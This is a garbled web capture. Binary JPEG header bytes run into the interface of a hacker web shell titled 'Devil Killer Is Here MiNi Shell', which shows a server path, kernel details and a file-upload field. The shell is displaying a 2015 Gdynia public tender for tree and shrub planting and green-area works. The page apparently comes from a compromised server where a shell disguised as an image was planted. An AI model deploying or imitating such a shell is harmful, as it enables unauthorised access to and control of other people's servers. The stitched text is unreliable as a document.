JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151021/153909-N-2015.html

<p class="kh_header"><b>Gdynia: NasadzeNIA drzew i krzewów rekompensujących oraz zagospodarowania wybranych terenów zieleni Miasta Gdyni</b><br>
<b>Numer ogłoszenia: 153909 - 2015; data zamieszczenia: 21.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Gdyni , Al. Marszałka Piłsudskiego 52/54, 81-382 Gdynia, woj. pomorskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gdynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> NasadzeNIA drzew i krzewów rekompensujących oraz zagospodarowania wybranych terenów zieleni Miasta Gdyni.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie nasadzeń roślinnych rekompensujących oraz zagospodarowanie wybranych terenów zieleni Miasta Gdyni w następujących grupach tematycznych (załączniki nr 8 - 10 do SIWZ):
Część 1 - sadzenie i pielęgnację drzew wzdłuż ulic: Kopernika, Wachowiaka - (załącznik nr 8 do SIWZ),
Część 2 - sadzenie i pielęgnację drzew wzdłuż ulic:  Zielona i Śmidowicza - (załącznik nr 8 do SIWZ),
Część 3 - sadzenie i pielęgnację drzew oraz krzewów wzdłuż ulic: Cechowa, Przebendowskich, Śmidowicza - (załącznik nr 8 do SIWZ),
Część 4  - sadzenie i pielęgnację drzew wzdłuż ulic: Kilińskiego, Świętojańskiej, Legionów, Narutowicza- (załącznik nr 8 do SIWZ),
Część 5  - zagospodarowanie terenu zieleni w rejonie placu zabaw przy ul. Złotej - (załącznik nr 8 do SIWZ),
Część 6  - zagospodarowanie terenu przy ul. Kopernika - (załącznik nr 9 do SIWZ),
Część 7  - zagospodarowanie terenu zieleni przy ul. Miętowej - (załącznik nr 10 do SIWZ).
Dla części 1:
Zestawienie materiałów do nasadzeń :
Drzewa liściaste 63 szt. ,
 paliki (do drzew sadzonych w gruncie) -  63 komplety, 
 osłony przeciwsolne dla 37 drzew ,
ekrany przeciwkorzeniowe dla 2 drzew, 
ziemia ogrodnicza min. 37,8 m3,
 kora min. 3,6 m3,
taśma ogrodnicza 238 mb,
żwir drenarski wg potrzeb,
chochoły z mat trzcinowych lub słomianych  wg potrzeb.
 wykonywania zabiegów pielęgnacyjnych w ciągu  trzech lat od daty wykonania nasadzeń.

Dla części 2:
Zestawienie materiałów do nasadzeń oraz 3-letniej pielęgnacji:
drzewa liściaste 46 szt. ,
paliki (do drzew sadzonych w gruncie) -  46 komplety, 
osłony przeciwsolne dla 44 drzew 
ziemia ogrodnicza min. 26,4 m3,
kora min. 2,6 m3,
taśma ogrodnicza 174 mb,
żwir drenarski wg potrzeb,
chochoły z mat trzcinowych lub słomianych  wg potrzeb.
wykonywania zabiegów pielęgnacyjnych w ciągu trzech lat od daty wykonania nasadzeń.
 Dla części 3:
Zestawienie materiałów:
drzewa liściaste 15 szt. 
krzewy liściaste 200 szt.,
paliki (do drzew sadzonych w gruncie) -  13 komplety, 
odciągi stalowe - 2 komplety,
 osłony przeciwsolne dla 3 drzew 
 ziemia ogrodnicza min. 21,5 m3,
 kora min. 2,1 m3,
taśma ogrodnicza 157 mb,
żwir drenarski wg potrzeb,
chochoły z mat trzcinowych lub słomianych  wg potrzeb.
przed wykonaniem dołu do posadzenia drzewa nr 17 (ul. Przebendowskich 5) wyjąć i zabezpieczyć należy rosnące tam bodziszki Tiny Monster, odzyskanymi roślinami, w równych częściach, podsadzić należy misy przy drzewach nr 16 (ul. Przebendowskich 38)  i nr 17 (ul. Przebendowskich 5);
przy wykonywaniu dołów do sadzenia drzew może zaistnieć konieczność usunięcia części systemów korzeniowych wcześniej usuniętych drzew; Zamawiający przewiduje możliwość wystąpienia konieczności wykonania częściowego karczowania dla nie więcej niż 2 miejsc sadzenia drzew.
 wykonywania zabiegów pielęgnacyjnych w ciągu  trzech lat od daty wykonania nasadzeń.

Dla części 4:
Zestawienie materiałów do nasadzeń :
Drzewa liściaste 13 szt. ,
krzewy liściaste 193 szt., 
materiały niezbędne do montażu 13 kompletów krat ochronnych,
osłony przeciwsolne dla 13 drzew 
ziemia ogrodnicza min. 21,5 m3,
kora min. 1,8 m3,
taśma ogrodnicza 77 mb,
żwir drenarski wg potrzeb,
chochoły z mat trzcinowych lub słomianych  wg potrzeb.
wykonywania zabiegów pielęgnacyjnych w ciągu 3lat od daty wykonania nasadzeń
Części 5:
 wprowadzenie roślinności ozdobnej: drzew 22 szt., krzewów 650 szt., traw 427 szt., bylin 1003 szt.;
ściółkowania nasadzeń korą i torfem odkwaszonym;
wygrodzenia nowych nasadzeń na okres pielęgnacji;
3-letniej pielęgnacji nasadzeń.

Dla Części 6:
transport i ustawienie 10 sztuk donic  przy ul. Kopernika
wprowadzenia roślinności ozdobnej: krzewy 40 szt., byliny 108 szt.
ściółkowania nasadzeń korą i torfem odkwaszonym;
wygrodzenia nowych nasadzeń na okres pielęgnacji;
3-letniej pielęgnacji nasadzeń.

Dla Części 7:
demontaż istniejącego szkieletu reklamy,
zdjęcie darni -165m2, 
wprowadzenia roślinności ozdobnej: krzewy 243 szt., byliny 199 szt., trawy ozdobne 113 szt.,
 ściółkowania nasadzeń korą i torfem odkwaszonym;
3-letniej pielęgnacji nasadzeń..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości:  
Część 1 - 2 000 zł
Część 2 - 1 300 zł
Część 3 - 700 zł
Część 4 - 600 zł
Część 5 - 1 100 zł
Część 6 - 300 zł
Część 7 - 300 zł
W przypadku składania oferty na kilka części oferta musi być zabezpieczona wadium w wysokości sumy wadiów na poszczególne części.Wadium może być wniesione w jednej lub kilku następujących formach:
-	w pieniądzu przelewem na konto:
Konto bankowe: PKO Bank Polski S.A.
PL 61 1440 1026 0000 0000 0040 6228
-	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	w gwarancjach bankowych, 
-	w gwarancjach ubezpieczeniowych,
-	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz.U. Nr 42 z 2007 r., poz. 275 z późn.zm.).

2. Wadium wnoszone w poręczeniach lub gwarancjach w oryginale należy złożyć w kasie PKO Bank Polski S.A. 18 Oddział  w Gdyni  mieszczący się w budynku Urzędu Miasta Gdyni przy Al. Marszałka Piłsudskiego 52/54 w sali nr 27, przed terminem składania ofert.
3.Kserokopie dowodu wniesienia wadium należy dołączyć do oferty.
4. Poręczenia bankowe, gwarancje bankowe i ubezpieczeniowe, poręczenia udzielane przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości muszą nieodwołalnie i bezwarunkowo zobowiązywać Poręczyciela lub Gwaranta do zapłaty kwoty pieniężnej na pierwsze wezwanie Zamawiającego, w wysokości odpowiadającej kwocie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający uzna powyższy warunek za spełniony, jeśli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej 1 usługę zagospodarowania terenu zieleni, o wartości netto (łącznej) minimum dla każdej części z osobna:
- dla Część 1:  30 000,00 zł (słownie: trzydzieści tysięcy złotych),
- dla Część 2: 30 000,00 zł (słownie: trzydzieści złotych),
-  dla Część 5: 20 000,00 zł (słownie: dwadzieścia tysięcy złotych).

W przypadku składania oferty na więcej niż jedną część, wystarczy wykazać się realizacją jednej usługi o wartości nie mniejszej niż wartość kwoty określonej przez Zamawiającego dla części kwotowo największej np. w przypadku startowania do części 1 i 2 wystarczy wykazać co najmniej 1 usługę o wartości minimum 30 000,00 zł netto.

2.	Wykonawca może polegać na wiedzy i doświadczeniu  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że warunki udziału w postępowaniu określone przez Zamawiającego spełniają łącznie, z tym że żaden z Wykonawców nie może podlegać wykluczeniu.
4.	Nie spełnienie któregokolwiek z postawionych warunków skutkuje wykluczeniem Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Zamawiający uzna powyższy warunek za spełniony, jeśli wykonawca dysponuje 1 osobą  posiadającą  następujące doświadczenie: pięć lat pracy przy wykonywaniu terenów zieleni oraz wykształcenie wyższe w zakresie: architektura krajobrazu lub ogrodnictwo lub leśnictwo
 Jeżeli wykonawca złoży ofertę na więcej niż jedną część zamówienia, to na każdą z tych części w celu spełnienia warunku dotyczącego dysponowania osobami zdolnymi do wykonania  zamówienia może wykazywać się tą samą osobą.
2.	Wykonawca może polegać na  osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że warunki udziału w postępowaniu określone przez Zamawiającego spełniają łącznie, z tym że żaden z Wykonawców nie może podlegać wykluczeniu.

4.	Nie spełnienie któregokolwiek z postawionych warunków skutkuje wykluczeniem Wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Formularz oferty. b) Dowód wniesienia wadium. c) 1.Pisemne zobowiązanie podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, w przypadku gdy Wykonawca polega na wiedzy i doświadczeniu , osobach zdolnych do wykonania zamówienia, tych podmiotów. d) W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia musi być załączone pełnomocnictwo zgodnie z art. 23 ust. 2 ustawy w oryginale lub kopii poświadczonej notarialnie za zgodność z oryginałem. 
e)	Pełnomocnictwo do podpisania oferty, względnie do podpisywania innych dokumentów składanych wraz z ofertą, o ile prawo to nie wynika z innych dokumentów (np. aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej) złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest upoważniony. Pełnomocnictwo powinno być w oryginale lub kopii poświadczonej notarialnie za zgodność z oryginałem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji wymiany roślin na wezwanie zamawiającego - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy, na uzasadniony wniosek Wykonawcy / Zamawiającego w następujących przypadkach:
a)	zmiany podwykonawcy za zgodą zamawiającego, (nowy podwykonawca musi spełniać takie same warunki jak podwykonawca pierwotny),
b)	 przesunięcie terminu wykonania nasadzeń, w przypadku wystąpienia ekstremalnych warunków pogodowych,
c)	w przypadku braku na rynku wymaganych odmian, gatunków roślin, możliwe będzie zastosowanie innej odmiany, gatunku, o podobnych parametrach i podobnej, nie wyższej cenie, za zgodą zamawiającego,
d)	zmiany wysokości wynagrodzenia Wykonawcy wynikającej ze zmiany stawki podatku od towarów i usług, zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę, a wysokość wynagrodzenia zostanie zmieniona na zasadach  określonych w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gdynia.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Gdyni, Biuro Ogrodnika Miasta, Al. Marszałka Piłsudskiego 52/54, 81-382 Gdynia..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2015 godzina 10:00, miejsce: W kancelarii ogólnej na parterze Urzędu Miasta w Gdyni Al. Marszałka Piłsudskiego 52/54..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1 - sadzenie i pielęgnację drzew wzdłuż ulic: Kopernika, Wachowiaka - (załącznik nr 8 do SIWZ).
Wykonawca zobowiązany będzie do wykonania nasadzeń:
-Drzewa liściaste 63 szt. 
- paliki (do drzew sadzonych w gruncie) -  63 komplety, 
- osłony przeciwsolne dla 37 drzew 
- ekrany przeciwkorzeniowe dla 2 drzew 
- ziemia ogrodnicza min. 37,8 m3,
- kora min. 3,6 m3,
-taśma ogrodnicza 238 mb,
-żwir drenarski wg potrzeb,
-chochoły z mat trzcinowych lub słomianych  wg potrzeb.
- wykonywania zabiegów pielęgnacyjnych w ciągu 3lat od daty wykonania nasadzeń.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji wymiany roślin na wezwanie zamawiającego - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 - sadzenie i pielęgnację drzew wzdłuż ulic:  Zielona i Śmidowicza - (załącznik nr 8 do SIWZ).
Wykonawca zobowiązany będzie do: -Drzewa liściaste 46 szt. 
- paliki (do drzew sadzonych w gruncie) -  46 komplety, 
- osłony przeciwsolne dla 44 drzew 
- ziemia ogrodnicza min. 26,4 m3,
- kora min. 2,6 m3,
-taśma ogrodnicza 174 mb,
-żwir drenarski wg potrzeb,
-chochoły z mat trzcinowych lub słomianych  wg potrzeb.
- wykonywania zabiegów pielęgnacyjnych w ciągu 3lat od daty wykonania nasadzeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji wymiany roślin na wezwanie zamawiającego - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3 - sadzenie i pielęgnację drzew oraz krzewów wzdłuż ulic: Cechowa, Przebendowskich, Śmidowicza - (załącznik nr 8 do SIWZ).
Wykonawca będzie zobowiązany do wykonania nasadzeń: -Drzewa liściaste 15 szt. 
